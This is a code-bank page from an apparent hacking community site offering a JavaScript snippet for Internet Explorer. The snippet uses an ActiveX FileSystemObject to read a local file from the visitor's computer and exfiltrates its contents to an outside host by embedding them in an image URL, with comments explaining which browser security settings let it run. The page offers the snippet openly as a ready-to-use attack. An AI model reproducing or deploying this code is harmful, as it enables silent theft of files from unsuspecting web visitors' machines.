Welcome to HBH V2 ! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.
Javascript File Reader (IE Only) - Javascript Code Bank
Javascript File Reader (IE Only)
Reads from C:\rawr.txt and uses CSRF to store the contents. (IE Only - dependant on settings)
<script type="text/javascript">
/* If Internet Explorer's security setting
"Initialize and script ActiveX controls
not marked as safe for scripting" is
set to Enable, the script will run fine
if it's set to Prompt, it'll tell you
an ActiveX control is running, and if
you decide to let it carry on, it'll
also run fine.
*/
var fso = new ActiveXObject( "Scripting.FileSystemObject" ); // Initialize FSO
fileObj = fso.GetFile( "C:\\rawr.txt" ); // Specify file to read
stream = fileObj.OpenAsTextStream( 1, 0 ); // Open as a text stream
data = stream.ReadAll(); // Read all contents
document.write( "<img src='http://system-meltdown." +
"kicks-ass.org/store.php?stuff=" + data + // Log the data stream via CSRF
"' />" );
</script>
Comments
Sorry but there are no comments to display